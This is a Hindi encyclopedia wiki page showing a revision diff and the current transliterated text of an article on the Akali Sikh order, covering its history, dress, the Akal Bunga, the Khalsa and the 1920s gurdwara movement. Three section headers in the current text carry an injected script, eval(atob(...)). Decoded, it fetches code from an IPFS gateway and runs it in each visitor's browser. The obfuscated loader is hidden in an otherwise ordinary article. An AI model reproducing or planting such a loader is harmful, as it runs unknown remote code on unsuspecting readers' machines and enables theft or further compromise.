Difference between revisions of "अकाली"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(7 intermediate revisions by 4 users not shown)
Line 1: Line 1:
अकाली का अर्थ है 'अमरणशील' जो 'अकाल पुरुष' शब्द से लिया गया है। अकाली सैनिक साधुओं का पंथ है, जिसकी स्थापना सन 1690 ई. में हुई। उपर्युक्त नवों [[सिक्ख]] सम्प्रदान नानकशाही 'पंजग्रन्थी' से प्रार्थना आदि करते हैं। 'जपजी', 'रहरास', 'सोहिला', 'सुखमनी' एवं 'आसा-दी-वार' का संग्रह ही 'पंजग्रन्थी' है।
+
अकाली का अर्थ है 'अमरणशील' जो 'अकाल पुरुष' शब्द से लिया गया है। अकाली सैनिक साधुओं का पंथ है, जिसकी स्थापना सन् 1690 ई. में हुई। उपर्युक्त नवों [[सिक्ख]] सम्प्रदान नानकशाही 'पंजग्रन्थी' से प्रार्थना आदि करते हैं। '[[जपुजी]]', 'रहरास', 'सोहिला', 'सुखमनी' एवं 'आसा-दी-वार' का संग्रह ही 'पंजग्रन्थी' है।
  
 
[[सिक्ख धर्म|सिक्खों]] में 'सहिजधारी' और 'सिंह' दो विभाग हैं। सहिजधारी वे हैं, जो विशेष रूप या बाना नहीं धारण करते। इनकी नानकपंथी, उदासी, हन्दाली, मीन, रामरंज और सेवापंथी छ: शाखाएँ हैं। सिंह लोगों के तीन पंथ हैं-
 
[[सिक्ख धर्म|सिक्खों]] में 'सहिजधारी' और 'सिंह' दो विभाग हैं। सहिजधारी वे हैं, जो विशेष रूप या बाना नहीं धारण करते। इनकी नानकपंथी, उदासी, हन्दाली, मीन, रामरंज और सेवापंथी छ: शाखाएँ हैं। सिंह लोगों के तीन पंथ हैं-
 
#खालसा, जिसे [[गुरु गोविन्द सिंह]] ने चलाया।  
 
#खालसा, जिसे [[गुरु गोविन्द सिंह]] ने चलाया।  
 
#निर्मल, जिसे वीरसिंह ने चलाया  
 
#निर्मल, जिसे वीरसिंह ने चलाया  
#अकाली, जिसे मानसिंह ने चलाया।  
+
#अकाली, जिसे मानसिंह ने चलाया।
 +
==अकाली सम्प्रदाय==
 +
{{main|अकाली सम्प्रदाय}}
 +
अकाली सम्प्रदाय दूसरे [[सिक्ख]] सम्प्रदायों से भिन्न है। क्योंकि [[नागा]] तथा गोसाइयों की तरह इनका यह सैनिक संगठन है। इसके संस्थापक मूलत: स्वयं गुरु गोविन्द सिंह थे। अकाली नीली धारीदार पोशाक पहनते हैं, कलाई पर लोहे का कड़ा, ऊँची तिकोनी नीली पगड़ी में तेज़ धारवाला लोहचक्र, कटार, छुरी तथा लोहे की जंजीर धारण करते हैं। सैनिक की हैसियत से अकाली 'निहंग' कहे जाते हैं। जिसका अर्थ है 'अनियंत्रित'। [[सिक्ख|सिक्खों]] के इतिहास में इनका महत्त्वपूर्ण स्थान है।
 +
==अकाल बुंगा==
 +
{{main|अकाल बुंगा}}
 +
इसी परंपरा में सिक्खों के छठे [[हरगोविंद खुराना|गुरु हरगोविंद]] ने '''अकाल बुंगे''' की स्थापना की। बुंगे का अर्थ है एक बड़ा भवन जिसके ऊपर गुंबज हो। इसके भीतर अकाल तख्त (अमृतसर में [[स्वर्ण मंदिर]] के सम्मुख) की रचना की गई और इसी भवन में अकालियों की गुप्त मंत्रणाएँ और गोष्ठियाँ होने लगीं। इनमें जो निर्णय होते थे उन्हें गुरुमताँ अर्थात्‌ गुरु का आदेश नाम दिया गया। धार्मिक समारोह के रूप में ये सम्मेलन होते थे।
 +
==खालसा पंथ==
 +
{{main|ख़ालसा पंथ}}
 +
[[30 मार्च]], सन्‌ 1699 को [[गुरु गोविंदसिंह]] ने [[खालसा पंथ]] की स्थापना की। इस पंथ के अनुयायी अकाली ही थे। [[औरंगजेब]] के अत्याचारों का मुकाबला करने के लिए अकाली खालसा सेना के रूप में सामने आए। गुरु ने उन्हें नीले वस्त्र पहनने का आदेश दिया और पाँच ककार (कच्छ, कड़ा, कृपाण, केश तथा कंघा) धारण करना भी उनके लिए अनिवार्य हुआ। अकाली सेना की एक शाखा [[मानसिंह|सरदार मानसिंह]] के नेतृत्व में निहंग सिंही के नाम से प्रसिद्ध हुई। [[फारसी भाषा]] में निहंग का अर्थ [[मगरमच्छ]] है जिसका तात्पर्य उस निर्भय व्यक्ति से है जो किसी अत्याचार के समक्ष नहीं झुकता।
 +
==महात्मा गांधी द्वारा सहयोग==
 +
अकालियों की सहायता में [[महात्मा गांधी]] ने बड़ा योग दिया और भारतीय कांग्रेस ने अकाली आंदोलन को पूरा-पूरा सहयोग दिया। [[अंग्रेज|अंग्रेजों]] ने भी अकालियों की वीरता से भयभीत होकर हमेशा उन्हें दबाने का प्रयास किया। इधर अकाली इतिहास में एक नया अध्याय आरंभ हुआ। जो गुरुद्वारे और धर्मशालाएँ दसों सिक्ख गुरुओं ने धर्मप्रचार और जनता की सेवा के लिए स्थापित की थीं और जिन्हें सदृढ़ रखने के लिए [[ रणजीत सिंह|महाराज रणजीत सिंह]] ने बड़ी-बड़ी जागीरें लगवा दी थीं वे अंग्रेजी राज्य के समय अनेक नीच आचरण वाले महंतों और पुजारियों के अधिकार में पहुँच गई थीं। उनमें सब प्रकार के दुराचरण होने लगे थे। उनके विरोध में कुछ [[सिक्ख]] तरुणों ने गुरुद्वारों के उद्धार के लिए अक्टूबर, सन्‌ 1920 में अकालियों की एक नई सेना एकत्रित की। इसका उद्देश्य अकालियों की पूर्व परंपरा के अनुसार त्याग और पवित्रता का व्रत लेना था। इन्होंने कई नगरों में अत्याचारी महंतों को हटाकर मठों पर अधिकार कर लिया।
  
==अकाली सम्प्रदाय==
+
इस समय [[गुरुनानक]] की जन्मभूमि [[ननकाना साहिब|ननकाना साहब]] (जिला शेखपुरा, वर्तमान पाकिस्तान में) के गुरुद्वारे पर महंत नारायण दास का अधिकार था। उससे मुक्त करने के लिए भी गुरुमता (प्रस्ताव) पास किया गया। सरदार लक्ष्मण सिंह ने 200 अकालियों के साथ चढ़ाई की; परंतु उनका तथा उनके साथियों का बड़ी निर्दयता के साथ वध कर दिया गया और उन्हें नाना प्रकार की क्रूर यातनाएँ दी गईं। और भी बहुत से मठों को छीनने में अकालियों को अनेक बलिदान करने पड़े। [[ब्रिटिश सरकार]] ने पहले महंतों की भरपूर सहायता की परंतु अंत में अकालियों की जीत हुई। सन्‌ 1925 तक समस्त गुरुद्वारे, '''शिरोमणि गुरुद्वारा कमेटी''' के अंतर्गत धारा 195 के अनुसार आ गए।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=हिन्दी विश्वकोश, खण्ड 1|लेखक= |अनुवादक= |आलोचक= |प्रकाशक= नागरी प्रचारिणी सभा, वाराणसी|संकलन= भारत डिस्कवरी पुस्तकालय|संपादन= |पृष्ठ संख्या=66 |url=}}</ref>
अकाली सम्प्रदाय दूसरे [[सिक्ख]] सम्प्रदायों से भिन्न है। क्योंकि [[नागा]] तथा गोसाइयों की तरह इनका यह सैनिक संगठन है। इसके संस्थापक मूलत: स्वयं गुरु गोविन्द सिंह थे। अकाली नीली धारीदार पोशाक पहनते हैं, कलाई पर लोहे का कड़ा, ऊँची तिकोनी नीली पगड़ी में तेज़ धारवाला लोहचक्र, कटार, छुरी तथा लोहे की जंजीर धारण करते हैं।
 
  
सैनिक की हैसियत से अकाली 'निहंग' कहे जाते हैं। जिसका अर्थ है 'अनियंत्रित'। [[सिक्ख|सिक्खों]] के इतिहास में इनका महत्त्वपूर्ण स्थान है। सन 1818 में मुट्ठीभर अकालियों ने मुल्तान पर घेरा डाला तथा उस पर विजय प्राप्त की। फूलसिंह का चरित्र अकालियों के पराक्रम पर प्रकाश डालता है। फूलसिंह ने पहले-पहल अकालियों के नेता के रूप में प्रसिद्धि प्राप्त की, जब उसने लॉर्ड मेटकॉफ़ के अंगरक्षकों पर हमला बोल दिया था। फिर वह रणजीत सिंह की सेवा में आ गया। फूलसिंह के नेतृत्व में अकालियों ने सन 1823 में यूसुफ़जइयों ([[पठान|पठानों]]) पर [[रणजीत सिंह]] को विजय दिलवायी। इस युद्ध में फूलसिंह को वीरगति प्राप्त हुई। उसका स्मारक नौशेरा में बना हुआ है। जो [[हिन्दू धर्म|हिन्दू]] एवं मुसलमान तीर्थयात्रियों के लिए समान श्रद्धा का स्थान है।
 
  
अकालियों का मुख्य कार्यालय [[अमृतसर]] में 'अकाल बुंगा' है। जो |सिक्खों के कई पूज्य सिंहासनों में से एक है। अकाली लोग धार्मिक कृत्यों का निर्देश वहीं से ग्रहण करते हैं। ये अपने को खालसों का नेता समझते हैं। रणजीत सिंह के राज्यकाल में इनका मुख्य कार्यालय आनन्दपुर हो गया था, किन्तु अब इनका प्रभाव बहुत कम पड़ गया है।
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
+
==टीका टिप्पणी और संदर्भ==
अकाली संघ के सदस्य ब्रह्मचर्य का पालन करते हैं। उनका कोई नियमित मुखिया या शिष्य नहीं होता, किन्तु फिर भी वे अपने गुरु की आज्ञा का पालन करते हैं। गुरु की जूठन चेले (शिष्य) प्रसाद के रूप में खाते हैं। वे दूसरे [[सिक्ख|सिक्खों]] की तरह मांस एवं मदिरा का सेवन नहीं करते हैं। किन्तु भाँग का सेवन अधिक मात्रा में करते हैं।
+
<references/>
 
 
{{प्रचार}}
 
{{लेख प्रगति
 
|आधार=
 
|प्रारम्भिक=प्रारम्भिक1
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{सिक्ख धर्म}}
 
{{सिक्ख धर्म}}
[[Category:सिक्ख धर्म]][[Category:सिक्ख धर्म कोश]]
+
[[Category:सिक्ख धर्म]][[Category:सिक्ख धर्म कोश]][[Category:धर्म कोश]][[Category:हिन्दी विश्वकोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 12:42, 19 May 2018

akali ka arth hai 'amaranashil' jo 'akal purush' shabd se liya gaya hai. akali sainik sadhuoan ka panth hai, jisaki sthapana sanh 1690 ee. mean huee. uparyukt navoan sikkh sampradan nanakashahi 'panjagranthi' se prarthana adi karate haian. 'japuji', 'raharas', 'sohila', 'sukhamani' evan 'asa-di-var' ka sangrah hi 'panjagranthi' hai.

sikkhoan mean 'sahijadhari' aur 'sianh' do vibhag haian. sahijadhari ve haian, jo vishesh roop ya bana nahian dharan karate. inaki nanakapanthi, udasi, handali, min, ramaranj aur sevapanthi chh: shakhaean haian. sianh logoan ke tin panth haian-

  1. khalasa, jise guru govind sianh ne chalaya.
  2. nirmal, jise virasianh ne chalaya
  3. akali, jise manasianh ne chalaya.

akali sampraday

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

akali sampraday doosare sikkh sampradayoan se bhinn hai. kyoanki naga tatha gosaiyoan ki tarah inaka yah sainik sangathan hai. isake sansthapak moolat: svayan guru govind sianh the. akali nili dharidar poshak pahanate haian, kalaee par lohe ka k da, ooanchi tikoni nili pag di mean tez dharavala lohachakr, katar, chhuri tatha lohe ki janjir dharan karate haian. sainik ki haisiyat se akali 'nihang' kahe jate haian. jisaka arth hai 'aniyantrit'. sikkhoan ke itihas mean inaka mahattvapoorn sthan hai.

akal buanga

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

isi paranpara mean sikkhoan ke chhathe guru haragoviand ne akal buange ki sthapana ki. buange ka arth hai ek b da bhavan jisake oopar guanbaj ho. isake bhitar akal takht (amritasar mean svarn mandir ke sammukh) ki rachana ki gee aur isi bhavan mean akaliyoan ki gupt mantranaean aur goshthiyaan hone lagian. inamean jo nirnay hote the unhean gurumataan arthath‌ guru ka adesh nam diya gaya. dharmik samaroh ke roop mean ye sammelan hote the.

khalasa panth

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

30 march, sanh‌ 1699 ko guru goviandasianh ne khalasa panth ki sthapana ki. is panth ke anuyayi akali hi the. aurangajeb ke atyacharoan ka mukabala karane ke lie akali khalasa sena ke roop mean samane ae. guru ne unhean nile vastr pahanane ka adesh diya aur paanch kakar (kachchh, k da, kripan, kesh tatha kangha) dharan karana bhi unake lie anivary hua. akali sena ki ek shakha saradar manasianh ke netritv mean nihang sianhi ke nam se prasiddh huee. pharasi bhasha mean nihang ka arth magaramachchh hai jisaka tatpary us nirbhay vyakti se hai jo kisi atyachar ke samaksh nahian jhukata.

mahatma gaandhi dvara sahayog

akaliyoan ki sahayata mean mahatma gaandhi ne b da yog diya aur bharatiy kaangres ne akali aandolan ko poora-poora sahayog diya. aangrejoan ne bhi akaliyoan ki virata se bhayabhit hokar hamesha unhean dabane ka prayas kiya. idhar akali itihas mean ek naya adhyay aranbh hua. jo gurudvare aur dharmashalaean dasoan sikkh guruoan ne dharmaprachar aur janata ki seva ke lie sthapit ki thian aur jinhean sadridh rakhane ke lie maharaj ranajit sianh ne b di-b di jagirean lagava di thian ve aangreji rajy ke samay anek nich acharan vale mahantoan aur pujariyoan ke adhikar mean pahuanch gee thian. unamean sab prakar ke duracharan hone lage the. unake virodh mean kuchh sikkh tarunoan ne gurudvaroan ke uddhar ke lie aktoobar, sanh‌ 1920 mean akaliyoan ki ek nee sena ekatrit ki. isaka uddeshy akaliyoan ki poorv paranpara ke anusar tyag aur pavitrata ka vrat lena tha. inhoanne kee nagaroan mean atyachari mahantoan ko hatakar mathoan par adhikar kar liya.

is samay gurunanak ki janmabhoomi nanakana sahab (jila shekhapura, vartaman pakistan mean) ke gurudvare par mahant narayan das ka adhikar tha. usase mukt karane ke lie bhi gurumata (prastav) pas kiya gaya. saradar lakshman sianh ne 200 akaliyoan ke sath chadhaee ki; parantu unaka tatha unake sathiyoan ka b di nirdayata ke sath vadh kar diya gaya aur unhean nana prakar ki kroor yatanaean di geean. aur bhi bahut se mathoan ko chhinane mean akaliyoan ko anek balidan karane p de. british sarakar ne pahale mahantoan ki bharapoor sahayata ki parantu aant mean akaliyoan ki jit huee. sanh‌ 1925 tak samast gurudvare, shiromani gurudvara kameti ke aantargat dhara 195 ke anusar a ge.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. hindi vishvakosh, khand 1 |prakashak: nagari pracharini sabha, varanasi |sankalan: bharat diskavari pustakalay |prishth sankhya: 66 |

sanbandhit lekh